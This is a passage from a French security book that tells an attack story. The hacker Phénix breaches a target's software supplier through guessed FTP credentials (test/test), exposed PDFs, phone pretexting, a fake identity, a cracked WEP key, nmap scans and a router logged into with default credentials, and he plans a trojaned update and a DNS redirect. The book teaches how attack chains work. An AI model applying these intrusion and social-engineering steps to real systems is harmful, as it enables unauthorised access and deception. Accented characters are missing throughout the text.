cherche maintenant dsesprment quelquun pour se couvrir." Pour vrier cette thorie, Phnix retourne sur netcraft.com et saisit le domaine de Visu IQ. Comme Phnix le supposait, la personne enregistre comme contact technique est un certain William Hynes. "Voil notre Will", dit Phnix en riant doucement. Pour tenter davoir une meilleure ide de la scurit interne de Visu IQ, Phnix retourne sur le forum dassistance et effectue quelques recherches sur les adresses IP quil a rcupres du message de Will avec la sortie du show run. Presque immdiatement, il rcupre une soixantaine de rsultats dans le forum. Alors quil parcourt les rsultats, il remarque que les messages semblent venir de diffrentes personnes au sein de Visu IQ.

144

Chanes dexploits

Tout devient clair comme de leau de roche pour Phnix. Visu IQ, tout bien considr, na pas vraiment de service informatique. Elle a un groupe de programmeurs (puisquils crivent des logiciels) qui partagent le travail de maintenance rseau, et Will Hynes est un type quils ont embauch pour les dcharger. Comme Will nest visiblement pas la hauteur de la tche, il cherche embaucher quelquun qui le soit. Avec ces dductions, Phnix est assez conant sur le fait que Visu IQ na pas vraiment de scurit en place. Phnix dcide dtre un peu plus invasif pour dcouvrir dautres choses sur Visu IQ. Il regarde nouveau les rsultats de Netcraft et remarque que Visu IQ hberge apparemment ses propres serveurs DNS. Sur cette pense, Phnix rchit rapidement. "Je me demande sils ont des serveurs FTP ?" Phnix saisit ftp.visuiq.com dans son navigateur et se voit immdiatement prsenter une bote de dialogue lui demandant un nom dutilisateur et un mot de passe. Phnix regarde rapidement les messages de Will Hynes quil a sauvegards. Il essaie dabord de saisir pokerman comme nom dutilisateur et comme mot de passe. Laccs lui est refus. Sans hsiter, alors que lurgence commence se faire sentir, Phnix commence tester sa liste didentiants et mots de passe les plus utiliss. Il commence par administrator/password, sans succs. Puis, il saisit test/test et se met glousser alors que la liste des chiers du rpertoire safche. Et bien sr, il existe un rpertoire nomm Grethrip. Phnix sinterrompt quelques secondes et essaie dimaginer ce qui se trouve dans ces rpertoires. En temps normal, Phnix serait plus prudent, nesprerait probablement pas attaquer de manire aussi frontale les accs dun serveur FTP et nouvrirait certainement pas les rpertoires dun serveur compromis de cette faon. Mais il sait quil ne dispose que de peu de temps. Il ouvre le rpertoire Grethrip et voit quil ne contient quun seul chier. Cest un excutable nomm 090609complet.exe. Phnix a grandi avec un pre retrait de larme avant quil ne soit n. Son pre tait spcialiste en cryptographie dans larme et lui avait inculqu sufsamment de maths et de crypto pour rendre un gamin normal fou. Mais, ce moment prcis, cela paye pour Phnix : sans hsiter, il comprend le nom du chier. "Nous sommes aujourdhui le 19 juin 2009, donc ce chier a probablement t cr le 9 juin 2009, cest--dire le 09-06-09." Phnix est presque sr davoir raison. Mais quel est ce chier et quoi sert-il ? Phnix en tlcharge une copie et louvre dans IDA Pro. Phnix est dle IDA Pro depuis la fac, et il sen sert encore plus depuis quil est entr dans le monde du piratage. Il regarde le chier passer plusieurs fois dans IDA Pro et le met en pause de temps en temps. Il comprend que lexcutable ne fait quextraire des chiers compresss inclus dans le paquet et les mettre dans un certain rpertoire. Puis il installe un autre petit programme qui semble sappeler Quizzi.

Chapitre 5

Chane dentreprises

145

Il cherche un rpertoire nomm C:\Program Files\VIQ\Data. Phnix tudie ce chemin un bref instant, retourne son navigateur et ouvre un nouvel onglet. Il lance une nouvelle requte Google :
intext:(VIQ | visuiq | program files viq)

Le premier rsultat de la requte est exactement ce que Phnix cherchait. Cest un lien vers un excutable nomm VIQv5.exe, disponible sur la page web de Visu IQ. Phnix clique sur le lien et tlcharge le chier. Il dmarre lexcutable et accepte les options par dfaut. Lune dentre elles attire son attention : "Veuillez choisir un rpertoire dinstallation pour Visu IQ." Phnix sait quil a rcupr le bon logiciel lorsquil voit le chemin par dfaut : C:\Program Files\VIQ. Il clique sur Suivant et laisse le programme terminer son installation. Il ouvre ensuite un Explorateur et navigue vers le rpertoire Program Files de son disque C: pour voir ce que le programme a install exactement. Il remarque un nouveau rpertoire nomm VIQ dans le rpertoire Program Files. Phnix descend dun niveau supplmentaire et ouvre le dossier. Il est heureux de voir quun rpertoire Data sy trouve. "Cool ! " sexclame-t-il. Une fois le logiciel install, Phnix clique sur le bouton Dmarrer de son bureau et remarque un nouveau programme nomm VIQ. Il clique sur licne et est accueilli par un message de bienvenue. "Merci davoir choisi Visu IQ. Veuillez saisir votre cl de licence ou cliquer sur Continuer pour ouvrir le mode dmo." Il clique sur Continuer et obtient une interface quivalente celle de lExplorateur de Windows. Il regarde la barre de menu et clique sur le menu Fichier. Il y trouve plusieurs options, y compris Ouvrir, Enregistrer, et quelques autres. Les deux options qui attirent le regard de Phnix sont Charger des donnes et Visualiser les donnes. Phnix clique sur loption Visualiser les donnes et un message safche, indiquant "Aucune donne charge afcher". "Bon, jai compris, se dit Phnix. Ces gens crent les modles de visualisation personnaliss qui fonctionnent sur leurs logiciels." Apparemment, Grethrip a achet le logiciel en question et lutilise des ns de visualisation de donnes. Au vu des titres de certains champs dans les modles, Grethrip semble avoir besoin de mesurer des ractions chimiques ou biologiques et danalyser des processus. Visu IQ met apparemment constamment jour les modles pour Grethrip et fournit probablement les mises jour via FTP. Si Grethrip est aussi paranoaque quelle semble ltre, elle ne permet probablement pas Visu IQ denvoyer directement les mises jour. "a commence sorganiser", dit Phnix en pensant voix haute. Avec la bouffe dadrnaline qui accompagne habituellement ses progrs, Phnix ralise quil a peut-tre trouv un point dentre. Sil pouvait, dune manire ou dune autre, accder la prochaine mise jour de Visu IQ avant que Grethrip la rcupre du serveur

146

Chanes dexploits

FTP de Visu IQ, il pourrait peut-tre rcuprer des informations chez Grethrip susceptibles de lui fournir un accs quelconque. Phnix a conscience quil doit effectuer beaucoup plus de recherches chez Visu IQ sil veut que tout cela fonctionne. Sans attendre, Phnix commence mettre en place ses outils de reconnaissance prfrs. Il veut dabord vrier ladresse de courrier lectronique que Will Hynes a fournie lors de lenregistrement de son domaine. Phnix regarde les rsultats de Netcraft et trouve ladresse whynes@visuiq.com. Il ouvre donc un de ses outils favoris : 1st Email Spider. Phnix saisit les chanes ncessaires, illustres la Figure 5.2.

Figure 5.2
Remplissage de linterface de 1st Email Spider.

Les rsultats reviennent rapidement et montrent que ladresse de Will Hynes se trouve un peu partout sur le site. Elle doit donc tre valide. "Voyons si je peux trouver des chiers intressants sur ce serveur web", se dit Phnix alors quil lance My IP Suite. Il clique sur le bouton Website Scanner gauche et saisit www.visuiq.com dans le champ du scanner. La Figure 5.3 illustre linterface remplie de My IP Suite.

Chapitre 5

Chane dentreprises

147

Figure 5.3
My IP Suite, rempli pour scanner le domaine de Visu IQ.

Phnix est heureux de trouver plus de 700 chiers stocks sur le site web. Une zone lui semble particulirement intressante : il y trouve une liste de chiers PDF numrots en squence (voir Figure 5.4).

Figure 5.4
Extrait des rsultats du scanner de Phnix.

148

Chanes dexploits

Phnix se demande si ces chiers PDF sont protgs ou sils sont accessibles dans le monde entier. Phnix retourne sur son navigateur et ouvre un nouvel onglet. Il saisit la premire adresse de sa liste de chiers PDF hbergs sur le domaine de Visu IQ :
http://www.visuiq.com/w2k-1.pdf

Le PDF souvre directement. Phnix nen croit pas ses yeux ! Ce sont des instructions pour tlcharger les mises jour partir du site FTP. Le PDF est adress un autre client : une universit quelconque. Le PDF inclut ladresse et les informations daccs. "Trop sympa ! scrie Phnix. Je nai plus qu trouver le PDF de Grethrip." Mais il se rend compte que cela prendra un certain temps : il y a environ 300 PDF sur le serveur. Il a soudain une ide : "Je vais tous les rcuprer, les fusionner et effectuer une recherche sur Grethrip sous Acrobat." Phnix tlcharge tous les PDF et ouvre le premier dans Acrobat. Il clique ensuite sur longlet Pages gauche et voit toutes les pages du premier PDF. Il accde au rpertoire de son disque C o il a enregistr tous les PDF et, en maintenant la touche Maj de son clavier enfonce, il slectionne le premier et le dernier PDF de la liste, ce qui slectionne lensemble des chiers du rpertoire. Phnix fait alors glisser son curseur sur son instance dAcrobat, qui revient en tant que fentre active. Il dpose tous les PDF slectionns aprs la dernire page de la vue Pages dAcrobat. Acrobat fait apparatre un indicateur de progression, et lopration se termine en 5 secondes. La liste des pages annonce maintenant plus de 350 pages. Phnix clique sur licne de recherche et saisit le nom Grethrip. Presque instantanment, il obtient un rsultat, page 279. Lidentiant et le mot de passe du rpertoire Grethrip du FTP de Visu IQ stalent en toutes lettres. Phnix sait quil aurait pu faire fonctionner son attaque avec le compte de test, mais il sait aussi quil est plus difcile de tracer une intrusion lorsquelle exploite un compte rgulirement utilis pour accder au site FTP. "Bon, on se calme Phnix, pas dexcitation, se dit Phnix. Il y a encore pas mal de reconnaissance faire." Phnix sapprte dsormais effectuer une reconnaissance plus complte de Visu IQ et ouvre un autre de ses outils favoris. Il lance un outil peu connu nomm SpiderFoot. SpiderFoot rcupre des informations propos de domaines cible, de sous-domaines et dhtes dautres informations. Phnix na pas utilis SpiderFoot depuis quelque temps ; il dcide de faire un essai sur un site quil connat. Il ouvre la fentre de SpiderFoot et saisit une URL de test. Il vrie tous les onglets et clique sur Start. Il obtient de nombreux rsultats qui rafrachissent sa mmoire. Phnix regarde SpiderFoot parcourir le Web la recherche dinformations sur le domaine cible de test quil a saisi (voir Figure 5.5).

Chapitre 5

Chane dentreprises

149

Figure 5.5
SpiderFoot rcupre des informations sur un domaine.

Attaque par ingnierie sociale Phnix remplace rapidement son domaine de test par celui de Visu IQ et continue fouiller sa bote outils de reconnaissance. Phnix regarde ses outils et se rend compte quil va manquer de temps. Il passe ltape suivante et dcide de passer laction. Il retourne sur le site web de Visu IQ et trouve la page de contact. Il trouve le numro gnral de contact et le numrote sur son tlphone portable. Une voix enjoue lui rpond : "Merci dappeler Visu IQ, que puis-je pour vous ?" Phnix sclaircit la voix et demande : "Je voudrais parler Will Hynes, sil vous plat." La rceptionniste rpond : "Un moment, je vous prie." Phnix raccroche le tlphone. Il sait quil existe un Will Hynes chez Visu IQ et que ses appels ne sont pas ltrs. Phnix labore alors un plan et une stratgie pour obtenir des informations de Will lorsquil appellera une deuxime fois. Il se souvient avoir vu un lien Parcours sur le ct gauche du site web de Visu IQ. Sur cette page, il consulte les biographies des cinq dirigeants de lentreprise. Il appuie sur le bouton Bis de son tlphone et appelle de

150

Chanes dexploits

nouveau le numro global de Visu IQ. Accueilli par la mme voix enjoue, il demande Will Hynes. La rceptionniste rpond et, en quelques instants, une voix rauque se fait entendre : "Ici Will Hynes." Phnix sclaircit la voix et rpond : "Bonjour, ici Flix Durand. Je travaille pour une entreprise de recherche sur le Web. Jai assist un dner avec Jacques Angles, de votre entreprise, et nous avons discut de solutions de visualisation de donnes. Il pense que le produit de votre entreprise pourrait bien tre ce dont nous avons besoin. Jai discut avec votre service commercial et ils mont donn tous les tarifs et un excellent aperu de votre produit. Jai quelques questions techniques, et ils mont adress vous pour y rpondre. Auriez-vous un peu de temps pour maider ?" Will obtient une commission chaque fois quil offre quelquun une aide technique et que cette personne nit par acheter Visu IQ. "Bien sr, que souhaitez-vous savoir ? Bien, commence Phnix, je ne suis pas sr du degr de personnalisation de votre produit et jignore tout de lefcacit et de la vitesse de votre processus de mise jour. Supposons que je souhaite modier notre ensemble de donnes. Comment puis-je vous demander cela ? Comment puis-je rcuprer la mise jour ? Et, surtout, sous quels dlais ?" Phnix sarrte et reprend son soufe en attendant que Will rponde. "En gros, le processus de mise jour est assez simple, rplique Will, et vous avez beaucoup de contrle sur la rapidit des mises jour. Nous rpondons habituellement ce type de requte sous 72 heures. En ce qui concerne leur rcupration, lorsque vous achetez le produit, nous crons un partage pour vous sur notre site FTP et nous vous en fournissons les accs. Lorsque nous mettons jour votre version, nous plaons un excutable auto-extractible qui inclut votre mise jour sur le partage FTP, auquel seuls vous et moi avons accs. Vous le tlchargez, lancez lexcutable, et votre produit est mis jour. Will fait une pause, et Phnix intervient. Bien, a semble effectivement assez simple. Est-il possible que les versions soient mlanges et que je me retrouve installer une version plus ancienne ? En fait, a ne peut pas arriver, rpond Will, heureux de lopportunit que lui offre la question. Nous travaillons pour un gros sous-traitant du ministre de la Dfense, et ils exigent, entre autres, quune somme de contrle MD5 soit associe chaque excutable. Une fois le chier cr, nous lanons cette procdure mathmatique dessus. Le processus MD5 cre une empreinte numrique du chier qui ne peut tre recalcule quavec la mme fonction sur le mme chier. Nous ne mettons pas ce numro sur le FTP et nous ne le rendons pas public. Nous lenvoyons au client qui lance la correction de son ct une fois quil a rcupr lexcutable. On appelle cela un hachage.

Chapitre 5

Chane dentreprises

151

Cest trs pratique pour vrier que lexcutable na pas t corrompu, et les gens du ministre veulent sassurer que le chier na pas t modi ou remplac par une version vrole pendant le transfert." Phnix est presque dmoralis. Son plan tait dajouter un cheval de Troie lexcutable utilis pour les mises jour. La procdure tait plutt simple : attendre que Visu IQ cre une mise jour pour Grethrip, en rcuprer une copie, y embarquer un cheval de Troie avant que Grethrip la tlcharge et attendre que quelquun de Grethrip tlcharge lexcutable et le lance, installant de ce fait le cheval de Troie ou le keylogger quil y aurait mis. Phnix navait pas encore vraiment dcid de ce quil allait utiliser, mais il considrait lide dun cheval de Troie daccs distant (RAT, Remote Access Trojan). Celui-ci aurait initi une connexion vers un serveur de contrle mis en place par Phnix sur le web. Comme la connexion aurait t initie depuis lintrieur, la plupart des parefeu auraient t inutiles. Phnix rchit avant de rpondre Will et termine la conversation : "a ressemble exactement ce que nous cherchons. Je recontacterai votre service commercial pour convenir dune dmonstration et ventuellement commander. Daccord, je suis heureux davoir pu vous aider. Nhsitez pas rappeler si vous avez des questions. Je ny manquerai pas", marmonne Phnix. Reconnaissance supplmentaire Lorsque Phnix appuie sur le bouton pour teindre son tlphone portable, il se lve et profre un chapelet de grossirets. "Et maintenant ?" sexclame-t-il. Son plan initial a t descendu en ammes. "Je dois trouver une autre mthode. Je dois my remettre et effectuer une reconnaissance plus pousse." Phnix a une ide. Il ralise que son plan initial dabuser de la conance entre Grethrip et Visu IQ est inefcace, mais il se demande quelles relations Visu IQ entretient avec dautres entreprises. Il dcide donc de retourner sa reconnaissance et de trouver quelles relations il a pu ngliger. Il reprend ses notes et ses dcouvertes, mais il nit par atteindre les limites de la frustration. Cela fait quatre heures quil passe au crible ses notes et lance des requtes Google, quand soudain quelque chose le frappe comme une monte dadrnaline. Phnix se souvient avoir vu un nom dans IDA Pro : Quizzi. Il se souvient aussi avoir vu passer ce nom dans une recherche prcdente. Quand il a lanc la requte Google link:www.visuiq.com, il se souvient avoir vu quelque chose propos de Quizzi dans un des rsultats.

152

Chanes dexploits

Phnix retourne ses rsultats et il ne met pas longtemps trouver ce quil cherche. Le quinzime rsultat de la requte en question est un lien vers http://www.quizzisoftware.com, qui a visiblement un lien vers le site web de Visu IQ. Phnix ouvre le site web de Quizzi et commence lire. Quizzi est partenaire et revendeur de Krystal Reporting, une entreprise connue de requtes et prsentation de donnes. Phnix remarque que le site web de Quizzi nest pas bien organis du tout. En fait, il est difcile de comprendre ce que lentreprise fait. Phnix passe dix minutes de plus sur le site avant de dcider que cest une perte de temps que dessayer de trouver comment Quizzi est connect Visu IQ. Visu IQ est dans la liste de ses clients, mais cest peu prs tout. Phnix sait quil va devoir faire un peu de reconnaissance active pour savoir exactement quels services Quizzi fournit Visu IQ. Il sait quun excutable de Quizzi est embarqu dans les excutables de mise jour de Visu IQ. Mais comment se retrouve-t-il l ? Pourquoi sy retrouve-t-il ? Phnix doit avoir une rponse ces questions avant de connatre les relations entre les deux entreprises. "Je dois en savoir plus sur Quizzi." Phnix retourne sur le site web de Quizzi et consulte la page de contact. Il regarde ladresse et voit quelle est en dehors de Chicago. Phnix regarde ladresse postale, qui lui parat bizarre. Il connat bien Chicago, et il pense que le 4029 S. Cottage Grove Street est situ dans un quartier rsidentiel. Se fondant sur son instinct, Phnix ouvre Google et clique sur le lien Maps en haut de la page de recherche. Il saisit ladresse de Quizzi (voir Figure 5.6).

Figure 5.6
Rsultat de la requte initiale sur Google Maps.

Chapitre 5

Chane dentreprises

153

Phnix regarde le rsultat et se souvient vaguement de la zone comme une zone rsidentielle o il a dj rendu visite un ami. Pour vrier, il clique sur longlet Street View. La Figure 5.7 illustre lutilisation de Street View dans Google.

Figure 5.7
Street View sur ladresse liste sur le site web de Quizzi.

Comme Phnix le pensait, il sagit dun quartier rsidentiel. Cela signie que les salaris de Quizzi, qui quils soient, travaillent probablement exclusivement depuis chez eux. "Je devrais probablement aller faire un peu de reconnaissance physique de la zone", se dit Phnix. Il retourne ses rsultats Google Maps et clique sur le lien Satellite. Phnix sait que sil travaille correctement, il aura une bonne ide de ce quoi il peut sattendre. Il doit savoir sil y a des arbres ou dautres points de repre naturels qui pourraient lui permettre de se cacher ou de masquer sa prsence si cela savrait ncessaire. En regardant la vue satellite, il remarque plusieurs arbres et ce qui semble tre un terrain de sport. Il y a aussi visiblement un terrain libre de lautre ct de la rue. La Figure 5.8 montre la proprit en vue satellite sur Google Maps. Phnix retourne sur Street View et examine la vue 360 de la zone et de ladresse. Il remarque un panneau LOUER devant le btiment ct de ladresse de Quizzi. Phnix attrape un stylo et note le numro afch. Il appelle le numro et prend rendezvous pour visiter lappartement.

154

Chanes dexploits

Figure 5.8
Rsultats de Google Maps sur la vue satellite.

Reconnaissance active agressive Le lendemain, Phnix arrive dix minutes en avance son rendez-vous pour lappartement. Il sait que lappartement est un deux-pices et quil cote 750 $ par mois. En faisant le calcul, un an de loyer cote 9 000 $. Phnix sait quil sagit dune somme importante passer dans une reconnaissance, mais, puisquil est pay plusieurs centaines de milliers deuros pour ce boulot, cest une goutte deau dans locan. Bien sr, pour son rendez-vous, il se munit de faux papiers didentit correspondant au nom quil a donn par tlphone. Lorsque Phnix arrive lappartement, il est accueilli par un homme g dune cinquantaine dannes. "Bonjour, vous devez tre Romain Carre, dit lhomme Phnix. Oui, cest bien moi, rpond Phnix. Bien, je vais vous montrer lappartement, dit lhomme. Au fait, je mappelle Thomas. Cest moi que vous contacterez si vous avez un souci. Je moccupe de tout ce qui est maintenance et assimil, dit-il en souriant. Daccord, bon savoir", rpond Phnix.

Chapitre 5

Chane dentreprises

155

Un coup dil lintrieur du btiment indique Phnix que les propritaires ne doivent pas tre du genre faire des vrications pousses sur les personnes et leurs possibilits nancires. Cela explique les deux mois de caution. Pendant que lhomme fait visiter lappartement Phnix, celui-ci xe du regard le btiment de lautre ct de la rue : il sait que celui-ci a probablement toutes les rponses aux questions quil se pose propos de Quizzi. Phnix, impatient, demande Thomas ce quil doit faire pour emmnager rapidement. Thomas lui indique que, ds quil sera en possession de largent, il lui fera signer le bail et lui donnera les cls. Phnix sort 15 billets de 100 dollars. Il les tend Thomas et, en quelques minutes, Phnix a sign un bail et rcupr les cls. Alors que Phnix sort du bureau de Thomas, celui-ci larrte et lui demande sil veut utiliser les meubles de dmonstration de lappartement ou apporter les siens. Phnix rpond quil souhaite garder les meubles de lappartement pour quelque temps. Thomas lui fait signe que ce nest pas un problme, et Phnix sort du bureau et se dirige vers sa voiture. Comme il sort du bureau de Thomas, Phnix remarque un gamin de 13-14 ans, assis dans lentre du bureau du complexe dappartements avec un ordinateur portable. Instinctivement, Phnix regarde lcran en passant et voit que le gamin est en ligne. "Excuse-moi, linterrompt Phnix, y a-t-il du Wi-Fi gratuit dans le btiment ?" Le garon regarde Phnix avec un il attentif, comme pour dterminer sil peut rpondre. "Pas vraiment. Quelquun a mis une borne dans le coin et le signal est trs bon ici, donc je lutilise quand je travaille pour mon oncle." Phnix le regarde et rchit une seconde. "Oh, Thomas est ton oncle ?" Sans lever les yeux, le garon acquiesce. Puis, avec un sourire espigle, le garon regarde Phnix. Son regard est maintenant plus amical et plus conant. Il dit Phnix, voix basse : "coute, je vais te rencarder. Le type qui a mis en place cet accs Wi-Fi ne sait apparemment pas que le WEP est cassable facilement. Il la congur avec un chiffrement WEP. Jai vu la fentre de rseaux Wi-Fi sactiver, jai tent de me connecter et je nai trouv que le WEP en question. Jai cherch sur Internet, jai trouv la vido de hackingdened et jai suivi les instructions pour casser sa cl. Comme tu as lair rglo, je vais te donner la cl et le SSID pour que tu puisses lutiliser." Le gamin sort alors un Post-it et griffonne dessus. Phnix stouffe presque en rcuprant le morceau de papier. Le SSID que le garon vient de lui donner le fait presque hurler de joie. Sur le papier, au-dessus de la longue cl WEP, se trouve le SSID : quizzi. Phnix ne peut pas croire la chance quil a. Ce gamin vient de lui faire le plus beau cadeau de sa vie ! Phnix ne perd pas de temps, il se prcipite sa voiture pour rcuprer son portable. Il ouvre son coffre, attrape lordinateur et retourne lintrieur pour

156

Chanes dexploits

commencer travailler sur le rseau sans-l de Quizzi. Il ouvre son portable et attend que Windows dmarre. Ds que le bureau apparat, Phnix clique sur licne de rseau sans-l et attend que Windows trouve les rseaux sans-l. Presque immdiatement, Windows Wireless Zero Cong afche les quelques rseaux dtects. Phnix sent ladrnaline monter lorsquil voit Quizzi dans la liste. Il clique instinctivement sur le rseau sans-l de Quizzi et lordinateur lui demande de saisir la cl rseau. Phnix tape le code que le gamin lui a donn quelques minutes plus tt. Windows afche un message de connexion, message qui disparat rapidement. Lindicateur de rseau sansl en bas droite de son cran afche maintenant un message : il est connect. "Je lai !" sexclame Phnix. Il commence rapidement explorer le rseau. Presque immdiatement, il lance VMware et dmarre une instance de machine virtuelle Backtrack. La Figure 5.9 illustre Backtrack.

Figure 5.9
La machine virtuelle Backtrack de Phnix se charge.

Phnix utilise Backtrack depuis sa cration. Il aime beaucoup le fait que certains de ses outils prfrs dexploitation et dexploration soient chargs par dfaut. Il apprcie

Chapitre 5

Chane dentreprises

157

galement de pouvoir dmarrer nimporte quel PC avec le CD de Backtrack et dobtenir, en quelques minutes, une bote outils de pntration complte au bout du clavier. Il lance dabord rapidement un scan Nmap pour avoir une ide de ce qui est prsent sur le rseau. Il vrie dabord les paramtres rseau que le point daccs lui a donns via DHCP et note mentalement ladresse de la passerelle. Il sagit du typique 192.168.1.1, utilis pour la plupart des routeurs domestiques. Il envoie une requte ping ladresse de la passerelle et obtient une rponse. "Bien, donc lICMP nest pas bloqu", se dit Phnix. Avec cette information, Phnix sait quil na pas besoin de passer le paramtre -P0 indiquant Nmap de ne pas utiliser de requtes ping et de se contenter de scanner. Il saisit une simple commande :
nmap -sS 192.168.1.0/24 -T INSANE

Phnix regarde les rsultats et voit quil ny a quun seul ordinateur sur le rseau. "Cest probablement une machine Windows, et a ressemble du Windows XP", se dit Phnix. Les rsultats intressants du premier scan sont les suivants :
Starting Nmap 4.60 ( http://nmap.org ) at 2008-10-10 19:38 GMT All 1715 scanned ports on 192.168.1.121 are closed Interesting ports on 192.168.1.122: Not shown: 1700 closed ports PORTSTATESERVICE 135/tcpopenmsrpc 445/tcpopenmicrosoft-ds 1025/tcpopenNFS-or-IIS 1026/tcpopenLSA-or-nterm 1029/tcpopenms-lsa 1030/tcpopeniad1 1032/tcpopeniad3 1033/tcpopennetinfo 1433/tcpopenms-sql-s MAC Address: 00:0C:29:C0:BA:A0 Nmap done: 256 IP addresses (1 hosts up) scanned in 29.462 seconds

"a pourrait tre un XP ou une machine Windows 2003 vraiment ferme. Je vais essayer la dtection du systme." Phnix lance un scan de dtection de systme sur lordinateur identi et obtient les rsultats suivants :
MAC Address: 00:1C:BF:66:E2:0A (Intel Corporate) Device type: general purpose Running: Microsoft Windows Vista OS details: Microsoft Windows Vista or Windows Server 2003 Network Distance: 1 hop Service Info: Host: Vista1; OSs: Windows Vista, Windows 2003

158

Chanes dexploits

"Flte ! dit Phnix. Cet imbcile tourne sous Vista." Phnix sait que la plupart des exploits quil utilise rgulirement sur des machines Windows mal mises jour ne fonctionneront probablement pas ici. Phnix sait aussi quavec limplmentation de la nouvelle ASLR (Address Space Layout Randomization, randomisation de la disposition de lespace dadresse), les exploits par dbordement de tampon sont maintenant presque impossibles. Il rchit quelques minutes. Il se souvient avoir lu un article propos dexploits ct client permettant dexploiter des machines Vista. Mais avec cette ide, Phnix se rend compte quil va tre difcile damener le type de Quizzi consulter un site compromis. Il envisage de lancer Nessus sur lordinateur Vista pour voir ce quoi il peut tre vulnrable. Il pense Nessus pendant quelques minutes avant de dcider dutiliser quelque chose de plus puissant pouvant effectivement lancer lattaque : Core Impact ! Phnix se souvient avoir vu une vido sur le Web qui montrait le produit. "Ce logiciel peut tester des centaines de vulnrabilits et les exploiter sur le temps quil me faudrait pour en tester une seule la main." Phnix sort son tlphone portable prpay et appelle le numro de contact qui lui a t donn quand il a commenc le projet. Le tlphone ne sonne quune fois et une voix rauque rpond. "Quest-ce que vous voulez ? dit la voix. Jai besoin dune licence pour Core Impact" explique Phnix. Il se prpare expliquer la personne lautre bout du l ce quest Core Impact, mais lhomme linterrompt : "Regardez votre messagerie. Vous devriez y trouver une cl de licence et un lien de tlchargement." Sans un mot de plus, lhomme raccroche. Phnix ouvre Gmail et vrie son compte. Il y trouve effectivement un message dun compte apparemment usurp avec, dans le sujet, CL. Phnix ouvre le message et copie la cl. Il suit le lien et tlcharge Core Impact. Une fois le logiciel tlcharg, Phnix linstalle rapidement en acceptant tous les choix par dfaut. Aprs lavoir install, il le dmarre. Lcran de bienvenue safche avec quelques options qui doivent tre congures. En regardant le panneau de contrle, Phnix est merveill du nombre dexploits fournis par Core Impact. La Figure 5.10 prsente lcran de bienvenue et la page de dmarrage par dfaut de Core Impact. Une fois remis de son merveillement, Phnix clique sur le bouton New Workspace et remplit les informations requises dans la bote de dialogue qui safche (voir Figure 5.11).

Chapitre 5

Chane dentreprises

159

Figure 5.10
Dmarrage de Core Impact.

Figure 5.11
Mise en place dun nouveau projet Core Impact.

160

Chanes dexploits

Phnix clique sur Next une premire fois, puis une seconde fois pour accepter les informations de licence. Core Impact lui demande de saisir une passphrase pour le projet et lui indique de dplacer son curseur dans une petite zone rectangulaire. Core Impact gnre une cl RSA et a besoin du mouvement de la souris pour gnrer des donnes alatoires pour la cration de la cl. Phnix suit les instructions, illustres la Figure 5.12.

Figure 5.12
Gnration de cl Core Impact.

Phnix clique sur Finish et la page de contrle et de gestion de modules de Core Impact apparat. Il parcourt les options du regard. La premire option est une option de dcouverte rseau : il dcide quil na ni le temps ni le besoin dutiliser cette option puisquil a dj scann le rseau avec Nmap. Phnix regarde directement loption de test dintrusion. Il clique sur le lien Network and Penetration Testing et une fentre intitule Penetration Wizard safche. Phnix clique sur Next et peut alors choisir un hte prcis ou une plage dadresses IP. Une fois de plus, comme le temps lui est compt, Phnix saisit ladresse de lordinateur sous Vista. La Figure 5.13 illustre le choix de la cible.

Chapitre 5

Chane dentreprises

161

Figure 5.13
Slection de la cible.

Phnix accepte les choix par dfaut des trois crans suivants, qui lui demandent la vitesse, la mthodologie dexploitation de la cible et sil faut ou non utiliser des exploits qui peuvent faire planter lordinateur distant. Phnix rchit cette dcision et choisit de ne pas utiliser ces exploits et de se limiter aux plus srs. Par ailleurs, un dni de service de la machine ne lui apporterait rien. Phnix clique sur Finish et, comme par magie, Core Impact commence chercher des vulnrabilits et essaie de les exploiter. Le logiciel tourne pendant une minute et ne renvoie rien. "Cette machine Vista seraitelle si scurise que cela ? se demande Phnix. "Jai d mal congurer quelque chose, et je nai pas le temps cette heure-ci dapprendre utiliser ce logiciel. Je vais devoir y aller la main." cet instant, Phnix se souvient avoir lu un article crit par un pirate clbre, expliquant que dans son quartier, la plupart des points daccs quil avait trouvs taient congurs avec le nom dutilisateur et le mot de passe par dfaut pour accder la gestion du routeur. "Cest peu probable, mais a vaut le coup dessayer". Phnix redmarre Nmap, cette fois en visant la passerelle par dfaut, comme il la fait sur la machine Vista.

162

Chanes dexploits

Voici ses rsultats :


MAC Address: 00:21:29:8B:D8:FC (Cisco-Linksys) Device type: WAP Running: Linksys embedded, Netgear embedded OS details: Linksys WRT54G or WRT54G2, or Netgear WGR614 or WPN824v2 Broadband router Network Distance: 1 hop

Les rsultats lui indiquent que le point daccs est, selon toutes probabilits, un Netgear. Phnix revient son navigateur web et ouvre www.defaultpasswordlist.com. La Figure 5.14 illustre cette page.

Figure 5.14
Site web defaultpasswordlist.com, fournissant une liste des mots de passe par dfaut des fabricants.

Phnix regarde la longue liste des mots de passe par dfaut et doit maintenant deviner le modle install au domicile du type de Quizzi. Il sait que le Netgear WGR614 est le routeur le plus vendu pour un usage domestique. Il fait donc ce pari. Il remplace ladresse du site par ladresse IP de la passerelle par dfaut de ses paramtres rseau, qui est galement celle du routeur Netgear. Comme prvu, la page est une page dauthentication rclamant un identiant et un mot de passe. Il saisit lidentiant admin et le mot de passe password. Phnix est impatient et retrouve le sourire quand la page de conguration du routeur apparat. Il clique sur licne WAN, mais son esprit se bloque immdiatement. "Cest bien gentil, mais comment vais-je accder la machine Vista ? Quest-ce que je fais l ?" Phnix te ses mains du clavier et respire profondment.

Chapitre 5

Chane dentreprises

163

Il lui faut un plan, et rapidement. Ce nest pas un de ces moments o il dispose de jours pour mettre en place des attaques labores, celles qui lui attirent ladmiration de ses copains du milieu. Phnix rchit : "Jai son routeur, il est moi. Comment accder la machine partir de l ?" Toutes sortes dides traversent lesprit de Phnix. Il regarde nouveau son cran, et une ide lui vient. "Le DNS est la cl. Cest comme a que je peux effectuer une attaque ct client. Je peux peut-tre empoisonner les enregistrements DNS et placer un enregistrement A pour Yahoo! ou un autre site que ce type est susceptible de visiter, pointant vers une version bourre dexploits de Yahoo!. Je naurai alors plus qu attendre." Phnix regarde lcran et ralise que le routeur na pas denregistrements A : il transfre toutes les requtes DNS au serveur DNS du FAI. "Mauvaise ide", se dit Phnix en se traitant didiot. Une autre ide lui vient alors : "Peut-tre que je peux mettre moi-mme en place un serveur DNS, faire pointer le serveur vers le DNS en question et congurer mon serveur DNS pour quil transfre toutes les requtes un serveur DNS rel sur Internet. H, je nai qu utiliser le DNS du FAI ! Et mettre un faux enregistrement A sur mon serveur DNS pour faire pointer http://www.google.com vers un serveur web qui charge automatiquement un exploit ou un cheval de Troie." Phnix rchit et fait claquer ses doigts. "a devrait marcher !" 